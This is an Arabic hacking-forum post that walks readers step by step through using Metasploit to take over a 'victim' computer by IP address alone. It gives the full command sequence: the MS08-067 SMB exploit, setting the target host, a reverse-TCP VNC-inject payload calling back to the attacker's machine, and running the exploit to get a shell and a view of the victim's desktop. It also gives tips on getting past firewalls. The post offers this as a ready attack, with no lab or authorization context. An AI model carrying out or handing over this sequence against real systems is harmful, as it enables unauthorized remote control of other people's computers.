:: vBspiders Professional Network :: - إختراق جهاز الضحية بأداة الميتاسبلوات

تحية لكم ياأعضاء ،نسأل الله أن تكونوا على خير حال
اليوم راح نشرح بالصور طريقة إستخدام مشروع الميتا لإختراق أي جهاز باستخدام الأي بي فقط
نتابع .....

نقوم بفتح أداة Metasploit Console وقد تم تطبيق الشرح باستخدام الإصدار 3-3 ، وكما هو متعارف عليه نقوم بأول خطوة وهي إستعراض الإكسبلويتات من خلال الأمر التالي :

كود:

show exploits

الخطوة الثانية نقوم بتحديد الإكسبلويت الذي سيتم إستخدامه وهو :

كود:

use windows/smb/ms08_067_netapi

الأن نقوم بعرض خيارات الثغرة من خلال الأمر التالي:

كود:

show options

ونقوم بتحديد الخيارات من خلال الأوامر التالية:

كود:

set rhost ip بدل كلمة أي بي نضع أي بي الجهاز المستهدف set target 0

بعد ذلك نقوم بإستعراض البايلودز لإختيار المناسب وذلك من خلال الأمر التالي:

كود:

show payloads

وفي هذا الشرح سيتم إستخدام البايلود التالي:

كود:

set payload windows/vncinject/reverse_tcp

الأن نقوم بعرض الخيارات من خلال الأمر التالي:

كود:

show options

وهنا سنقوم بتحديد خيار هوست الإتصال العكسي من خلال ما يلي :

كود:

set lhost ip بدل كلمة أي بي تضع أي بي جهازك

الأن وبعد إكمالنا لكافة الخطوات بقي أن ننفذ أمر تشغيل الثغرة من خلال الأمر التالي :

كود:

exploit

بعد تنفيذ أمر التشغيل سوف يظهر لك بيانات عن جهاز الضحية ونظامة وسوف يتم فتح نافذة دوس للتحكم بجهازة كما سيتم فتح شاشة تصور سطح مكتبة

ملاحظة:قد يواجه التطبيق معوقات مثل جدار الحماية وأيضا عدم وجود المنفذ رقم 445 مفتوحا لدى الجهاز المستهدف وطبعا يمكن تجاوز أي إشكالية من خلال التعديل على البايلود ، كما يمكن إستخدام الإصدار رقم 3-2 فهو مناسب لتنفيذ الثغرة بشكل أفضل

نسأل الله أن نكون قد وفقنا في طرح الموضوع ونأسف على أي تقصير ،